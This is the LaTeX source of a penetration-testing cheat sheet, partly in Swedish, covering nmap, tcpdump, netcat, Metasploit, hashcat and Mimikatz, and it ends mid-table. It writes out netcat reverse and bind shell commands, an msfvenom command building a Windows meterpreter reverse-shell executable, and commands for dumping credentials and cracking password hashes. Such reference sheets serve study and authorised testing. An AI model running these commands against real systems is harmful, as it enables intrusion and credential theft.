\documentclass[10pt,a4paper]{article} % Packages \usepackage{fancyhdr} % For header and footer \usepackage{multicol} % Allows multicols in tables \usepackage{tabularx} % Intelligent column widths \usepackage{tabulary} % Used in header and footer \usepackage{hhline} % Border under tables \usepackage{graphicx} % For images \usepackage{xcolor} % For hex colours %\usepackage[utf8x]{inputenc} % For unicode character support \usepackage[T1]{fontenc} % Without this we get weird character replacements \usepackage{colortbl} % For coloured tables \usepackage{setspace} % For line height \usepackage{lastpage} % Needed for total page number \usepackage{seqsplit} % Splits long words. %\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely. \usepackage[normalem]{ulem} % For underlining links % Most of the following are not required for the majority % of cheat sheets but are needed for some symbol support. \usepackage{amsmath} % Symbols \usepackage{MnSymbol} % Symbols \usepackage{wasysym} % Symbols %\usepackage[english,german,french,spanish,italian]{babel} % Languages % Document Info \author{unicornfox} \pdfinfo{ /Title (test.pdf) /Creator (Cheatography) /Author (unicornfox) /Subject (Test Cheat Sheet) } % Lengths and widths \addtolength{\textwidth}{6cm} \addtolength{\textheight}{-1cm} \addtolength{\hoffset}{-3cm} \addtolength{\voffset}{-2cm} \setlength{\tabcolsep}{0.2cm} % Space between columns \setlength{\headsep}{-12pt} % Reduce space between header and content \setlength{\headheight}{85pt} % If less, LaTeX automatically increases it \renewcommand{\footrulewidth}{0pt} % Remove footer line \renewcommand{\headrulewidth}{0pt} % Remove header line \renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit % This two commands together give roughly % the right line height in the tables \renewcommand{\arraystretch}{1.3} \onehalfspacing % Commands \newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour \newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols \newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns \newcommand{\tn}{\tabularnewline} % Required as custom column type in use % Font and Colours \definecolor{HeadBackground}{HTML}{333333} \definecolor{FootBackground}{HTML}{666666} \definecolor{TextColor}{HTML}{333333} \definecolor{DarkBackground}{HTML}{363433} \definecolor{LightBackground}{HTML}{F8F8F8} \renewcommand{\familydefault}{\sfdefault} \color{TextColor} % Header and Footer \pagestyle{fancy} \fancyhead{} % Set header to blank \fancyfoot{} % Set footer to blank \fancyhead[L]{ \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{C} \SetRowColor{DarkBackground} \vspace{-7pt} {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}} } \end{tabulary} \columnbreak \begin{tabulary}{11cm}{L} \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{Test Cheat Sheet}}}} \\ \normalsize{by \textcolor{DarkBackground}{unicornfox} via \textcolor{DarkBackground}{\uline{cheatography.com/213883/cs/46571/}}} \end{tabulary} \end{multicols}} \fancyfoot[L]{ \footnotesize \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{LL} \SetRowColor{FootBackground} \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}} \\ \vspace{-2pt}unicornfox \\ \uline{cheatography.com/unicornfox} \\ \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}} \\ \vspace{-2pt}Not Yet Published.\\ Updated 4th July, 2025.\\ Page {\thepage} of \pageref{LastPage}. \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}} \\ \SetRowColor{white} \vspace{-5pt} %\includegraphics[width=48px,height=48px]{dave.jpeg} Measure your website readability!\\ www.readability-score.com \end{tabulary} \end{multicols}} \begin{document} \raggedright \raggedcolumns % Set font size to small. Switch to any value % from this page to resize cheat sheet text: % www.emerson.emory.edu/services/latex/latex_169.html \footnotesize % Small font. \begin{multicols*}{2} \begin{tabularx}{8.4cm}{x{3.76 cm} x{4.24 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{nmap}} \tn % Row 0 \SetRowColor{LightBackground} {\bf{-sn}} \textless{}ip\textgreater{} & Ping sweep \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} {\bf{-sT}} \textless{}ip\textgreater{} & TCP-full connect scan \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} {\bf{-sS}} \textless{}ip\textgreater{} & TCP SYN half-open (requires root) \tn % Row Count 4 (+ 2) % Row 3 \SetRowColor{white} {\bf{-sU}} \textless{}ip\textgreater{} & UDP scan \tn % Row Count 5 (+ 1) % Row 4 \SetRowColor{LightBackground} {\bf{-sV}} \textless{}ip\textgreater{} & Version scan \tn % Row Count 6 (+ 1) % Row 5 \SetRowColor{white} {\bf{-O}} \textless{}ip\textgreater{} & OS-fingerprint \tn % Row Count 7 (+ 1) % Row 6 \SetRowColor{LightBackground} {\bf{-Pn}} \textless{}ip\textgreater{} & Treat all host as online (skip host discovery) \tn % Row Count 10 (+ 3) % Row 7 \SetRowColor{white} {\bf{-sX}} \textless{}ip\textgreater{} & Xmas scan \tn % Row Count 11 (+ 1) % Row 8 \SetRowColor{LightBackground} {\bf{-{}-top-ports=10}} \textless{}ip\textgreater{} & Scan top 10 most common ports \tn % Row Count 13 (+ 2) % Row 9 \SetRowColor{white} \textless{}ip\textgreater{} -sV -Pn {\bf{-{}-reason}} & Add {\bf{-{}-reason}} to get why port is open \tn % Row Count 15 (+ 2) % Row 10 \SetRowColor{LightBackground} {\bf{-6}} -sV \textless{}ip\textgreater{} & IPv6 scan \tn % Row Count 16 (+ 1) % Row 11 \SetRowColor{white} {\bf{-sA}} \textless{}ip\textgreater{} & Avoid IDS/IPS firewalls (only sends ACK-flag) \tn % Row Count 19 (+ 3) % Row 12 \SetRowColor{LightBackground} {\bf{-iL}} list-of-ips.txt & Scan from list of IPs \tn % Row Count 21 (+ 2) % Row 13 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Save output to file}} \{\{border=1\}\}} \tn % Row Count 22 (+ 1) % Row 14 \SetRowColor{LightBackground} -oN & Normal output \tn % Row Count 23 (+ 1) % Row 15 \SetRowColor{white} -oX & XML format \tn % Row Count 24 (+ 1) % Row 16 \SetRowColor{LightBackground} -oG & Greppable format \tn % Row Count 25 (+ 1) % Row 17 \SetRowColor{white} -oS & Script kiddie output \tn % Row Count 26 (+ 1) % Row 18 \SetRowColor{LightBackground} -oA & Output in the three useful formats (all but script kiddie) \tn % Row Count 29 (+ 3) % Row 19 \SetRowColor{white} {\emph{-p 0–65535}} eller -{\emph{-all-ports}} & Skanna alla portar (-p- har inte med port 0) \tn % Row Count 32 (+ 3) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{3.76 cm} x{4.24 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{nmap (cont)}} \tn % Row 20 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Scripts}} \{\{border=1\}\}} \tn % Row Count 1 (+ 1) % Row 21 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{auth, broadcast, brute, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, saft, version, vuln}}} \tn % Row Count 4 (+ 3) % Row 22 \SetRowColor{LightBackground} {\bf{-sC/-{}-script}} & Script scan \tn % Row Count 5 (+ 1) % Row 23 \SetRowColor{white} nmap -{}-script=vuln \textless{}ip\textgreater{} -Pn -n –v & Use {\bf{-{}-script=vuln}} to find vulnerabilities for host \tn % Row Count 8 (+ 3) % Row 24 \SetRowColor{LightBackground} nmap -{}-script-help=http-brute & Find info about script {\bf{http-brute}} \tn % Row Count 10 (+ 2) % Row 25 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Timing template}} \{\{border=1\}\}} \tn % Row Count 11 (+ 1) % Row 26 \SetRowColor{LightBackground} {\emph{900000ms, 900, 900s, and 15m}} & Time definitions. All means the same amount of time \tn % Row Count 14 (+ 3) % Row 27 \SetRowColor{white} -T0 & paranoid \tn % Row Count 15 (+ 1) % Row 28 \SetRowColor{LightBackground} -T1 & sneaky \tn % Row Count 16 (+ 1) % Row 29 \SetRowColor{white} -T2 & polite \tn % Row Count 17 (+ 1) % Row 30 \SetRowColor{LightBackground} -T3 & normal (default) \tn % Row Count 18 (+ 1) % Row 31 \SetRowColor{white} -T4 & agressive \tn % Row Count 19 (+ 1) % Row 32 \SetRowColor{LightBackground} -T5 & insane \tn % Row Count 20 (+ 1) % Row 33 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Delays}} \{\{border=1\}\}} \tn % Row Count 21 (+ 1) % Row 34 \SetRowColor{LightBackground} -{}-host-timeout \textless{}time\textgreater{} & Give up on slow target hosts. value 0 can be used to mean "no timeout" \tn % Row Count 25 (+ 4) % Row 35 \SetRowColor{white} -{}-scan-delay \textless{}time\textgreater{} & Wait \textless{}time\textgreater{} between each probe \tn % Row Count 27 (+ 2) % Row 36 \SetRowColor{LightBackground} -{}-script-timeout \textless{}time\textgreater{} & Sets a ceiling on script execution time. \tn % Row Count 29 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{tcpdump}} \tn % Row 0 \SetRowColor{LightBackground} {\bf{-D}} & List alla interfaces \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} {\bf{-i}} & Record from specific interface \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} {\bf{-nn}} & Do not resolve hostnames \tn % Row Count 5 (+ 2) % Row 3 \SetRowColor{white} {\bf{-w}} output.pcap & write to file \tn % Row Count 6 (+ 1) % Row 4 \SetRowColor{LightBackground} {\bf{-v}} & Verbose \tn % Row Count 7 (+ 1) % Row 5 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{EXAMPLE}}} \tn % Row Count 8 (+ 1) % Row 6 \SetRowColor{LightBackground} tcpdump -i eth1 & Record traffic from eth1 \tn % Row Count 10 (+ 2) % Row 7 \SetRowColor{white} tcpdump -i eth1 {\bf{-w}} \textasciitilde{}/output.pcap & Write to file \tn % Row Count 12 (+ 2) % Row 8 \SetRowColor{LightBackground} tcpdump -i eth1 {\bf{-r}} \textasciitilde{}/output.pcap & Read from file \tn % Row Count 14 (+ 2) % Row 9 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{FILTER}}} \tn % Row Count 15 (+ 1) % Row 10 \SetRowColor{LightBackground} tcpdump -i eth0 {\bf{host}} 127.0.0.1 & Filter on host 127.0.0.1 using {\bf{host}} \tn % Row Count 17 (+ 2) % Row 11 \SetRowColor{white} tcpdump -i eth0 dest {\bf{net}} 172.16.146.0/24 & Filter on network using {\bf{net}} (and dest) \tn % Row Count 20 (+ 3) % Row 12 \SetRowColor{LightBackground} tcpdump -i eth0 {\bf{portrange}} 0-1024 & Filter on {\bf{portrange}} \tn % Row Count 22 (+ 2) % Row 13 \SetRowColor{white} tcpdump -i eth0 {\bf{port}} 80 & Filter on {\bf{port}} \tn % Row Count 24 (+ 2) % Row 14 \SetRowColor{LightBackground} tcpdump -i eth0 tcp src port 80 & Filter on {\bf{src}} (and port) \tn % Row Count 26 (+ 2) % Row 15 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{PROTOCOL}}} \tn % Row Count 27 (+ 1) % Row 16 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{ether, ip, ip6 , arp, rarp, tcp, udp}}} \tn % Row Count 28 (+ 1) % Row 17 \SetRowColor{white} tcpdump -r sus.pcap {\bf{icmp}} or {\bf{host}} 172.16.146.1 & Filter on protocol {\bf{icmp}} and {\bf{host}} \tn % Row Count 31 (+ 3) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{tcpdump (cont)}} \tn % Row 18 \SetRowColor{LightBackground} tcpdump -r sus.pcap not icmp & Filter NOT on protocol {\bf{icmp}} \tn % Row Count 2 (+ 2) % Row 19 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{Use `and / or` to combine these together} \tn % Row Count 3 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.12 cm} x{4.88 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{netcat (nc)}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Flags}} \{\{border=1\}\}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} -l & Listen mode \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} -L & Listen harder - Make a persistant listener \tn % Row Count 4 (+ 2) % Row 3 \SetRowColor{white} -n & Don't resolve names \tn % Row Count 5 (+ 1) % Row 4 \SetRowColor{LightBackground} -z & Zero I/O. Don't send any data \tn % Row Count 7 (+ 2) % Row 5 \SetRowColor{white} -v & verbose \tn % Row Count 8 (+ 1) % Row 6 \SetRowColor{LightBackground} -p & Local port \tn % Row Count 9 (+ 1) % Row 7 \SetRowColor{white} -u & UDP connection \tn % Row Count 10 (+ 1) % Row 8 \SetRowColor{LightBackground} -e & Program to execute after connections occurs (unsafe, needs to be enabled in some cases. Depends on nc-version) \tn % Row Count 15 (+ 5) % Row 9 \SetRowColor{white} -w 10 & Timout after 10 seconds \tn % Row Count 16 (+ 1) % Row 10 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Examples}} \{\{border=1\}\}} \tn % Row Count 17 (+ 1) % Row 11 \SetRowColor{white} nc -l -p 1337 -e /bin/bash & Open listener \tn % Row Count 19 (+ 2) % Row 12 \SetRowColor{LightBackground} nc -zvn \textless{}ip\textgreater{} \textless{}port\textgreater{} & Use as port scanner \tn % Row Count 21 (+ 2) % Row 13 \SetRowColor{white} nc \textless{}ip\textgreater{} \textless{}port\textgreater{} & Connect to port, eg webserver \tn % Row Count 23 (+ 2) % Row 14 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{File receiver/sender}} \{\{border=1\}\}} \tn % Row Count 24 (+ 1) % Row 15 \SetRowColor{white} nc -l port \textgreater{} filename & On host: Start file receiver \tn % Row Count 26 (+ 2) % Row 16 \SetRowColor{LightBackground} nc host port \textless{} filename & On client: Send file \tn % Row Count 28 (+ 2) % Row 17 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Reverse Shell (attacker is listener)}} \{\{border=1\}\}} \tn % Row Count 30 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{3.12 cm} x{4.88 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{netcat (nc) (cont)}} \tn % Row 18 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{On target machine}}} \tn % Row Count 1 (+ 1) % Row 19 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`nc \textless{}ip\textgreater{} \textless{}port\textgreater{} -e /bin/bash`} \tn % Row Count 2 (+ 1) % Row 20 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{On attacking machine}}} \tn % Row Count 3 (+ 1) % Row 21 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`nc -lvnp \textless{}port\textgreater{}`} \tn % Row Count 4 (+ 1) % Row 22 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Bind Shell (victim is listener)}} \{\{border=1\}\}} \tn % Row Count 5 (+ 1) % Row 23 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{On target machine}}} \tn % Row Count 6 (+ 1) % Row 24 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`nc -lvnp \textless{}port\textgreater{} -e /bin/bash`} \tn % Row Count 7 (+ 1) % Row 25 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{On attacking machine}}} \tn % Row Count 8 (+ 1) % Row 26 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`nc -nv \textless{}ip\textgreater{} \textless{}port\textgreater{}`} \tn % Row Count 9 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Metasploit}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{ MODULES}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Auxiliary & Verktygsmoduler f{\"o}r scanning, fuzzing, bruteforce, sniffning \tn % Row Count 5 (+ 4) % Row 2 \SetRowColor{LightBackground} Encoders & Kodar payloads f{\"o}r att undvika antivirus \tn % Row Count 8 (+ 3) % Row 3 \SetRowColor{white} Exploits & Utnyttjar en sårbarhet i mål (t.ex. buffer overflow, RCE) \tn % Row Count 11 (+ 3) % Row 4 \SetRowColor{LightBackground} NOPs & (No Operation code) anv{\"a}nds f{\"o}r padding i exploits \tn % Row Count 14 (+ 3) % Row 5 \SetRowColor{white} Payloads & Kod som k{\"o}rs efter en exploit (t.ex. reverse shell) \tn % Row Count 17 (+ 3) % Row 6 \SetRowColor{LightBackground} Plugins & Additional scripts can be integrated within an assessment \seqsplit{with msfconsole and} coexist. \tn % Row Count 22 (+ 5) % Row 7 \SetRowColor{white} Post & Anv{\"a}nds efter access, f{\"o}r enum, dump, persistence \tn % Row Count 25 (+ 3) % Row 8 \SetRowColor{LightBackground} Evasion & Designade f{\"o}r att undvika AV/EDR, t.ex. via obfuskering \tn % Row Count 28 (+ 3) % Row 9 \SetRowColor{white} \seqsplit{Exploit/multi/handler} & Ta emot en payload (lyssnare) \tn % Row Count 30 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Metasploit (cont)}} \tn % Row 10 \SetRowColor{LightBackground} {\bf{{\emph{\textless{}modultyp\textgreater{}/\textless{}plattform\textgreater{}/\textless{}kategori\textgreater{}/\textless{}namn\textgreater{}}}}} & Exploit/modul format (exploit, auxiliary, post ) \tn % Row Count 3 (+ 3) % Row 11 \SetRowColor{white} {\bf{{\emph{\textless{}payloadtyp\textgreater{}/\textless{}plattform\textgreater{}/\textless{}funktion\textgreater{}}}}} & Payload format (windows, linux, cmd) \tn % Row Count 6 (+ 3) % Row 12 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{ API }}} \tn % Row Count 7 (+ 1) % Row 13 \SetRowColor{white} {\bf{ load extapi }} & Extended API (måste laddas manuellt) \tn % Row Count 9 (+ 2) % Row 14 \SetRowColor{LightBackground} stdapi & Standard-API (laddas automatiskt) \tn % Row Count 11 (+ 2) % Row 15 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{ MISC }}} \tn % Row Count 12 (+ 1) % Row 16 \SetRowColor{LightBackground} smart\_hashdump & V{\"a}ljer smart/automatiskt vilka hashar att dumpa (lokalt eller dom{\"a}n) \tn % Row Count 16 (+ 4) % Row 17 \SetRowColor{white} search name:mysql & Search exploits (mysql) \tn % Row Count 18 (+ 2) % Row 18 \SetRowColor{LightBackground} search cve:2011 author:jduck platform:linux & Search exploit \tn % Row Count 21 (+ 3) % Row 19 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{ PAYLOADTYPER}}} \tn % Row Count 22 (+ 1) % Row 20 \SetRowColor{LightBackground} reverse\_tcp & Offret ansluter tillbaka till attackeraren via TCP \tn % Row Count 25 (+ 3) % Row 21 \SetRowColor{white} bind\_tcp & Offret har lyssnare på en port, som attackerare utnyttjar och ansluter in på \tn % Row Count 29 (+ 4) % Row 22 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{ METERPRETER}}} \tn % Row Count 30 (+ 1) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Metasploit (cont)}} \tn % Row 23 \SetRowColor{LightBackground} {\bf{migrate \textless{}psId\textgreater{}}} & Migrera till en stabilare process tex winlogon.exe (beh{\"o}ver k{\"o}ra ps) \tn % Row Count 4 (+ 4) % Row 24 \SetRowColor{white} {\bf{load kiwi}} & Mimikatz från meterpreter \tn % Row Count 6 (+ 2) % Row 25 \SetRowColor{LightBackground} {\bf{creds\_all}} & Dumpa alla creds (kiwi) \tn % Row Count 8 (+ 2) % Row 26 \SetRowColor{white} {\bf{creds\_kerberos}} & se TGT/TGS (kiwi) \tn % Row Count 9 (+ 1) % Row 27 \SetRowColor{LightBackground} {\bf{route add 10.1.10.5 1}} & Routa trafik via en host och session (1) \tn % Row Count 11 (+ 2) % Row 28 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{ MSFVENOM }}} \tn % Row Count 12 (+ 1) % Row 29 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{skapa payloads och exploits i olika format – t.ex. .exe, .ps1, .apk, .asp, .dll}}} \tn % Row Count 14 (+ 2) % Row 30 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{msfvenom -p \seqsplit{windows/meterpreter/reverse\_tcp} LHOST=10.10.14.25 LPORT=4444 -f exe -o payload.exe}}} \tn % Row Count 16 (+ 2) % Row 31 \SetRowColor{LightBackground} -p & Payloadtyp \tn % Row Count 17 (+ 1) % Row 32 \SetRowColor{white} -f & Format \tn % Row Count 18 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{p{0.8 cm} p{0.8 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{LINUX}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{} \tn % Row Count 0 (+ 0) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4.24 cm} x{3.76 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Crontab}} \tn % Row 0 \SetRowColor{LightBackground} crontab -l & List jobs \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} crontab -e & Edit jobs \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`* * * * * /home/user/script.sh`} \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Min}} {\emph{Hour}} {\bf{Day(Month,1-31)}} {\emph{Month}} {\bf{Day(Week, 0-6)}}} \tn % Row Count 5 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{2.48 cm} x{5.52 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{MISC}} \tn % Row 0 \SetRowColor{LightBackground} \seqsplit{/etc/nsswitch}.conf & Styr i vilken ordning Linux-systemet slår upp information om anv{\"a}ndare, grupper, och namn – t.ex. via filer, DNS eller LDAP. \tn % Row Count 5 (+ 5) % Row 1 \SetRowColor{white} getent shadow & Lista shawdow (kr{\"a}ver root) \tn % Row Count 7 (+ 2) % Row 2 \SetRowColor{LightBackground} getent passwd & Lista passwd \tn % Row Count 9 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{p{0.8 cm} p{0.8 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{PASSWORD}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{} \tn % Row Count 0 (+ 0) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{5.36 cm} x{2.64 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{/etc/shadow}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{sai:\$6\${\bf{YTJ7JKnfsB4esnbS\$}}5XvmYk2.GXVWhDo2TYGN2hCitD/wU9Kov.uZD8xsnleuf1r0ARX3qodIKiDsdoQA444b8IMPMOnUWDmVJVkeg1:19446:0:99999:7:::} \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} YTJ7JKnfsB4esnbS & salt \tn % Row Count 4 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Password hashes}}} \tn % Row Count 5 (+ 1) % Row 3 \SetRowColor{white} {\bf{\$1\$ }} & MD5 \tn % Row Count 6 (+ 1) % Row 4 \SetRowColor{LightBackground} {\bf{\$2\$ }} & Blowfish \tn % Row Count 7 (+ 1) % Row 5 \SetRowColor{white} {\bf{\$2y\$ }} & Blowfish \tn % Row Count 8 (+ 1) % Row 6 \SetRowColor{LightBackground} {\bf{\$5\$ }} & SHA-256 \tn % Row Count 9 (+ 1) % Row 7 \SetRowColor{white} {\bf{\$6\$ }} & SHA-512 \tn % Row Count 10 (+ 1) % Row 8 \SetRowColor{LightBackground} {\bf{\$y\$ }} & yescrypt \tn % Row Count 11 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Hashcat}} \tn % Row 0 \SetRowColor{LightBackground} hashcat -a 0 -m 16500 \textless{}jwt\textgreater{} \textless{}wordlist\textgreater{} & Crack JWT \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} hashcat -m 1800 -a 0 -o found1.txt crack1.hash 500\_pa - ssw ord s.txt & Crack Linux SHA512 password with dict \tn % Row Count 6 (+ 4) % Row 2 \SetRowColor{LightBackground} hashcat -{}-force -m 13100 -a 0 lab3.h ashcat /path/ to/ Dic - t.txt -{}-show & Crack Kerberos Service Ticket for account password \tn % Row Count 10 (+ 4) % Row 3 \SetRowColor{white} {\bf{-a}} & Attack mode (0=dictionary, 3=BF) \tn % Row Count 12 (+ 2) % Row 4 \SetRowColor{LightBackground} {\bf{-m}} & Hash-type \tn % Row Count 13 (+ 1) % Row 5 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Hash types}}} \tn % Row Count 14 (+ 1) % Row 6 \SetRowColor{LightBackground} -m 0 & MD5 \tn % Row Count 15 (+ 1) % Row 7 \SetRowColor{white} -m 100 & SHA1 \tn % Row Count 16 (+ 1) % Row 8 \SetRowColor{LightBackground} -m 1000 & NTLM \tn % Row Count 17 (+ 1) % Row 9 \SetRowColor{white} -m 1800 & SHA512crypt \tn % Row Count 18 (+ 1) % Row 10 \SetRowColor{LightBackground} -m 3000 & LM \tn % Row Count 19 (+ 1) % Row 11 \SetRowColor{white} -m 5600 & NetNTLMv2 \tn % Row Count 20 (+ 1) % Row 12 \SetRowColor{LightBackground} -m 13100 & Kerberos \tn % Row Count 21 (+ 1) % Row 13 \SetRowColor{white} -m 16500 & JWT \tn % Row Count 22 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.28 cm} x{4.72 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Mimikatz}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Kr{\"a}ver local admin och tillgång till SYSTEM f{\"o}r att få ut något intressant}}} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} {\bf{privilege::debug}} & Ge Mimikatz r{\"a}ttigheter att l{\"a}sa LSASS-processminnet \tn % Row Count 5 (+ 3) % Row 2 \SetRowColor{LightBackground} {\bf{token::elevate}} & Bli SYSTEM (kr{\"a}vs f{\"o}r att l{\"a}sa LSASS) \tn % Row Count 7 (+ 2) % Row 3 \SetRowColor{white} {\bf{sekurlsa::logonpasswords}} & Dumpa hashar från minnet \tn % Row Count 9 (+ 2) % Row 4 \SetRowColor{LightBackground} {\bf{token::whoami}} & Lista vem som k{\"o}r mimikatz 